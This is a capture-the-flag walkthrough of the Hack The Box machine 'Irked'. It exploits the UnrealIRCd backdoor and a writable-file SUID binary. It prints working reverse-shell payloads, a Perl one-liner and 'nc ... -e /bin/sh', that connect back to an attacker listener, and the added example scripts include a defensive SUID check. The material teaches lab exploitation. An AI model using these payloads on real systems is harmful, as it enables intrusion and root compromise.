
HacktheBox.eu - Irked - Update





Recon

Let's use threader3000 for our recon scan. It's a threaded scanner written in Python that does a super quick up/down scan on all TCP ports, then suggests an nmap scan based on the results. It will automatically save the nmap scan results as XML, which we can then convert to HTML with xsltproc:


xsltproc ./irked.htb/irked.htb.xml -o ./irked.html
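If xsltproc (or nmap's stylesheet) isn't installed, the same XML can be summarised with nothing but the Python standard library. The script below is an added example, not part of the writeup or of threader3000: it parses nmap -oX output, keeps only open ports, and renders the comma-separated port list and a small HTML table. The XML document inside it is constructed for the example from the ports and services the scan found (the 192.0.2.10 address is a documentation placeholder, and the banners of the rpc/status ports are left empty rather than guessed).

```python
"""Summarise nmap XML output (nmap -oX) without xsltproc.

Added example for the Irked writeup; not the writeup's or threader3000's code.
Only the standard library is used, so it runs anywhere Python does.
"""
import html
import xml.etree.ElementTree as ET

# Constructed sample of what threader3000's saved scan looks like. Ports and
# product names follow the writeup; 192.0.2.10 is a placeholder address.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -p22,80,111,6697,8067,55015,65534 -sV -oX irked.htb.xml irked.htb">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="irked.htb" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="6.7p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.10"/></port>
      <port protocol="tcp" portid="111"><state state="open"/>
        <service name="rpcbind"/></port>
      <port protocol="tcp" portid="6697"><state state="open"/>
        <service name="irc" product="UnrealIRCd"/></port>
      <port protocol="tcp" portid="8067"><state state="open"/>
        <service name="irc" product="UnrealIRCd"/></port>
      <port protocol="tcp" portid="55015"><state state="open"/>
        <service name="status"/></port>
      <port protocol="tcp" portid="65534"><state state="open"/>
        <service name="irc" product="UnrealIRCd"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {host_label: [(port, proto, service, banner), ...]} for open ports only."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        addr_el = host.find("address")
        name_el = host.find("hostnames/hostname")
        # Prefer the user-supplied hostname, fall back to the address.
        label = name_el.get("name") if name_el is not None else addr_el.get("addr")
        open_ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are noise for this summary
            svc = port.find("service")
            name = svc.get("name", "?") if svc is not None else "?"
            # Banner is "product version" with missing parts dropped.
            parts = (svc.get("product"), svc.get("version")) if svc is not None else ()
            banner = " ".join(p for p in parts if p)
            open_ports.append((int(port.get("portid")), port.get("protocol"), name, banner))
        results[label] = sorted(open_ports)
    return results


def port_summary(results):
    """Comma-separated sorted list of open ports across all hosts (threader3000 style)."""
    ports = sorted({p for plist in results.values() for p, _, _, _ in plist})
    return ",".join(str(p) for p in ports)


def to_html(results):
    """Render the parsed results as a plain HTML table, escaping banner text."""
    rows = ["<tr><th>host</th><th>port</th><th>service</th><th>version</th></tr>"]
    for host, ports in results.items():
        for port, proto, name, banner in ports:
            rows.append("<tr><td>%s</td><td>%d/%s</td><td>%s</td><td>%s</td></tr>"
                        % (html.escape(host), port, proto, html.escape(name), html.escape(banner)))
    return "<table>\n" + "\n".join(rows) + "\n</table>"


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(port_summary(parsed))
    print(to_html(parsed))
```

To use it on a real scan, replace SAMPLE_NMAP_XML with the contents of ./irked.htb/irked.htb.xml (for example via open(path).read()) and write the to_html() result to irked.html.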



We've got a goodly amount of ports open to us on this box


22,80,111,6697,8067,55015,65534


We can see 22 is OpenSSH 6.7p1


80 is Apache 2.4.10

111 & 55015 both say RPC

And the others say UnrealIRCd… Whatever that is, let's start on port 80 and see what it shows us.



An angry face with "IRC is almost working!"


If we run dirb we will find some default Apache pages but not much else to go on.


What is that UnrealIRCd?


https://www.unrealircd.org/



Oh it's an IRC server… that makes sense.


If we google UnrealIRCd and exploit, there appears to be a backdoor in some versions. We don't know what specific version this is, but it seems like a pretty easy exploit to test.





Exploit


https://metalkey.github.io/unrealircd-3281-backdoor-command-execution.html


So we just need to type "AB" and we can get code execution?


Ok. Let's follow along with the blog, but with a perl reverse TCP shell instead.


Let's start by generating our perl reverse shell:


msfvenom  -p cmd/unix/reverse_perl LHOST=10.10.14.13 LPORT=5555 


Which gives us this output:


perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.13:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'



So now we just need to stick "AB;" in front of it:


AB;perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.13:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'


Let's set up our netcat listener in case it works:


nc -lnvp 5555



And if we pick any of the IRC ports and netcat to them, we are met with this, just like in the blog.



Paste in our backdoor.


And we caught our reverse shell.



But the shell is kind of bad; let's see if we have Python installed and upgrade this shell:



python -c 'import pty; pty.spawn("/bin/bash")'




Better





If we poke around in some folders we eventually come to /home/djmardov/Documents/.


In this folder is a file named .backup and a user.txt file we don't yet have access to.


If we read the contents of .backup we see this:


Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss



Two things here… That looks like the Konami code (not really important), but this also says it is a password for something hidden inside a file with steganography.


The only file we have seen so far is that irked face on the default webpage.


Let's save a copy of it to our Kali box.


I named mine irked.txt 


If we use steghide to try to extract anything hidden, the command would be:


steghide extract -sf ./index.jpeg 


And it looks like there was something there.



Let's check it out:

cat pass.txt
Kab6h+m+bbp2J:HG


Ok, so it seems like this is a password for something, and considering we found the key in the djmardov folder we could guess that it is their password.


Let's try to ssh as djmardov now:


ssh djmardov@irked.htb




And now we can read the user flag from /home/djmardov/Documents/user.txt.



Now we need to figure out a path to root.


Let's use updog and wget to copy linpeas over to irked and see if we can find a path forward.


On Kali we start updog just by typing:



updog


And it will serve anything that is in the folder it was started from; the default port is 9090.


Let's make a new folder on irked to download this into:


mkdir /tmp/circusmonkey



Then we need to give it execution rights:


chmod +x ./linpeas.sh



And we see this interesting SUID binary that is normally not on boxes:


/usr/bin/viewuser


What does that do?



Looks like it's trying to read something from /tmp/listusers…


But that file doesn't exist….


So let's make it:


echo "whoami" > /tmp/listusers
chmod 777 /tmp/listusers



And then run /usr/bin/viewuser.



Cool, looks like we have the results of whoami here… Which means we can put anything we want in that file in /tmp and the SUID binary should run it as root.


So let's get a shell as root.


Let's start by setting up another listener on our Kali box:


nc -lnvp 5566



Then on irked we will write our nc connection command to the listusers file:


echo "nc 10.10.14.13 5566 -e /bin/sh" > /tmp/listusers


Now if we run /usr/bin/viewuser again, hopefully we catch a shell as root:



/usr/bin/viewuser


And there we go, we are root, and now we can get the root flag.
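The reason this works is that a root-owned SUID binary runs whatever it finds at a path any user can write to. The check below is an added example, not code from the box or the writeup, showing what a privileged helper like viewuser should verify before executing a file it reads from disk; it assumes (the page does not show viewuser's internals) that the binary simply executes /tmp/listusers with no ownership or permission checks. fake_stat() builds constructed os.stat_result objects so the demonstration runs without touching real files; safe_to_execute() is the live wrapper you would actually call. The UNTRUSTED_DIRS list is an assumed policy, not a system constant.

```python
"""Guard for a privileged program that executes a file from disk.

Added example for the viewuser privilege escalation in the Irked writeup;
not the box's code. It models a check a setuid helper should apply before
running a file, instead of trusting /tmp/listusers blindly.
"""
import os
import stat

# Assumed policy: scratch directories every user can write to are never
# acceptable sources of code for a privileged program.
UNTRUSTED_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def check_stat(path, file_st, parent_st, trusted_uid=0):
    """Return the list of reasons the file must NOT be executed (empty = OK).

    file_st / parent_st are os.stat_result values taken with os.lstat, so a
    symlink is seen as a symlink instead of being followed.
    """
    reasons = []
    if not os.path.isabs(path):
        reasons.append("path is not absolute")
    norm = os.path.normpath(path)
    for d in UNTRUSTED_DIRS:
        if norm == d or norm.startswith(d + os.sep):
            reasons.append("path lies under world-writable scratch dir %s" % d)
            break
    if stat.S_ISLNK(file_st.st_mode):
        reasons.append("file is a symlink")
    elif not stat.S_ISREG(file_st.st_mode):
        reasons.append("file is not a regular file")
    if file_st.st_uid != trusted_uid:
        reasons.append("file owned by uid %d, expected %d" % (file_st.st_uid, trusted_uid))
    if file_st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("file is group- or world-writable")
    if parent_st.st_uid != trusted_uid:
        reasons.append("parent directory not owned by uid %d" % trusted_uid)
    if parent_st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        # Catches /tmp even with the sticky bit: anyone can create the file there.
        reasons.append("parent directory is group- or world-writable")
    return reasons


def safe_to_execute(path, trusted_uid=0):
    """Live wrapper: lstat the file and its parent directory, then apply check_stat."""
    try:
        file_st = os.lstat(path)
        parent_st = os.lstat(os.path.dirname(os.path.normpath(path)) or "/")
    except OSError as exc:
        return ["cannot stat: %s" % exc]
    return check_stat(path, file_st, parent_st, trusted_uid)


def fake_stat(kind, perm, uid):
    """Constructed os.stat_result for offline demonstration; no real file involved."""
    type_bits = {"file": stat.S_IFREG, "dir": stat.S_IFDIR, "link": stat.S_IFLNK}[kind]
    # Field order: mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime
    return os.stat_result((type_bits | perm, 0, 0, 1, uid, uid, 0, 0, 0, 0))


if __name__ == "__main__":
    # The writeup's situation: a 777 file owned by an ordinary user, inside /tmp (1777, root).
    for r in check_stat("/tmp/listusers", fake_stat("file", 0o777, 1000), fake_stat("dir", 0o1777, 0)):
        print("reject:", r)
    # What a safe deployment looks like: root-owned 755 file in a root-owned 755 directory.
    ok = check_stat("/usr/local/lib/viewuser/listusers", fake_stat("file", 0o755, 0), fake_stat("dir", 0o755, 0))
    print("accept" if not ok else ok)
```

Every line the writeup relied on (creating the file in /tmp, chmod 777, owning it as djmardov) trips a separate reason here, so the helper would refuse to run it; the same checks, expressed with stat() in C, belong in any setuid program that reads a path it does not fully control.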




